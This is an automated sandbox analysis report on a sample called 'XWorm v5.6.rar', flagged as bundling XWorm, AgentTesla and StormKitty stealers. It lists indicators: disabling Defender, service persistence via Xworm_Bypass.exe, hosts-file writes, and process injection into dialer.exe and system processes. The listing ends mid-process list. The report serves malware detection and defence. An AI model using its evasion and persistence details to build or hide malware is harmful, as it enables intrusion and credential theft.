Malware Analysis Report

2024-09-23 02:54

Sample ID 240715-mexmla1gnj
Target XWorm v5.6.rar
SHA256 ed24079ff53c18d2ba5f45e9b314ff04d60511afe9c61d73d355842781c8402d
Tags
agenttesla stormkitty xworm evasion execution keylogger persistence pyinstaller spyware stealer trojan upx privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ed24079ff53c18d2ba5f45e9b314ff04d60511afe9c61d73d355842781c8402d

Threat Level: Known bad

The file XWorm v5.6.rar was found to be: Known bad.

Malicious Activity Summary

agenttesla stormkitty xworm evasion execution keylogger persistence pyinstaller spyware stealer trojan upx privilege_escalation

Stormkitty family

Agenttesla family

Xworm family

Detect Xworm Payload

Contains code to disable Windows Defender

StormKitty payload

Modifies security service

AgentTesla

AgentTesla payload

AgentTesla payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Sets service image path in registry

Creates new service(s)

Stops running service(s)

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Detects Pyinstaller

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Checks processor information in registry

Runs ping.exe

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-15 10:23

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 10:23

Reported

2024-07-15 10:27

Platform

win7-20240708-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\Xworm_Bypass.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MCDRJPTJ\ImagePath = "C:\\ProgramData\\Xworm_Bypass.exe" C:\Windows\system32\services.exe N/A

Stops running service(s)

evasion execution

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\perfc011.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfh00A.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\perfh007.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfh009.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfc010.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\PerfStringBackup.TMP C:\Windows\system32\wbem\WMIADAP.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Xworm_Bypass.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\perfc00A.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfc00C.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfh00C.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
File created C:\Windows\system32\perfh010.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfh011.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File opened for modification C:\Windows\system32\PerfStringBackup.INI C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfc007.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\system32\perfc009.dat C:\Windows\system32\wbem\WMIADAP.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2960 set thread context of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2976 set thread context of 464 N/A C:\ProgramData\Xworm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2976 set thread context of 1680 N/A C:\ProgramData\Xworm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2976 set thread context of 1376 N/A C:\ProgramData\Xworm_Bypass.exe C:\Windows\system32\dialer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A
File created C:\Windows\inf\WmiApRpl\WmiApRpl.h C:\Windows\system32\wbem\WMIADAP.EXE N/A
File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini C:\Windows\system32\wbem\WMIADAP.EXE N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80353449a1d6da01 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Xworm_Bypass.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 2160 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 2160 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 2160 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 2160 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1068 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1780 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1780 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1780 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2960 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 276 wrote to memory of 428 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 276 wrote to memory of 472 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\services.exe
PID 276 wrote to memory of 488 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 276 wrote to memory of 496 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsm.exe
PID 276 wrote to memory of 596 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 672 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 740 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 276 wrote to memory of 812 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 276 wrote to memory of 848 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 964 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 236 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 344 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 276 wrote to memory of 1032 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 1116 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\taskhost.exe
PID 276 wrote to memory of 1188 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\Dwm.exe
PID 276 wrote to memory of 1248 N/A C:\Windows\system32\dialer.exe C:\Windows\Explorer.EXE
PID 276 wrote to memory of 624 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\DllHost.exe
PID 276 wrote to memory of 2352 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 276 wrote to memory of 1076 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sppsvc.exe
PID 276 wrote to memory of 2952 N/A C:\Windows\system32\dialer.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 276 wrote to memory of 2960 N/A C:\Windows\system32\dialer.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 276 wrote to memory of 1068 N/A C:\Windows\system32\dialer.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 276 wrote to memory of 2548 N/A C:\Windows\system32\dialer.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 276 wrote to memory of 1320 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\wbem\WMIADAP.EXE
PID 276 wrote to memory of 2228 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 276 wrote to memory of 316 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sc.exe
PID 276 wrote to memory of 2240 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\conhost.exe
PID 472 wrote to memory of 2976 N/A C:\Windows\system32\services.exe C:\ProgramData\Xworm_Bypass.exe
PID 472 wrote to memory of 2976 N/A C:\Windows\system32\services.exe C:\ProgramData\Xworm_Bypass.exe
PID 472 wrote to memory of 2976 N/A C:\Windows\system32\services.exe C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 2976 N/A C:\Windows\system32\dialer.exe C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 2040 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sc.exe
PID 276 wrote to memory of 1196 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\conhost.exe
PID 276 wrote to memory of 2976 N/A C:\Windows\system32\dialer.exe C:\ProgramData\Xworm_Bypass.exe
PID 276 wrote to memory of 1988 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 276 wrote to memory of 1080 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\conhost.exe
PID 2672 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2672 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2672 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 276 wrote to memory of 2672 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\cmd.exe
PID 276 wrote to memory of 896 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\conhost.exe
PID 276 wrote to memory of 1132 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sc.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

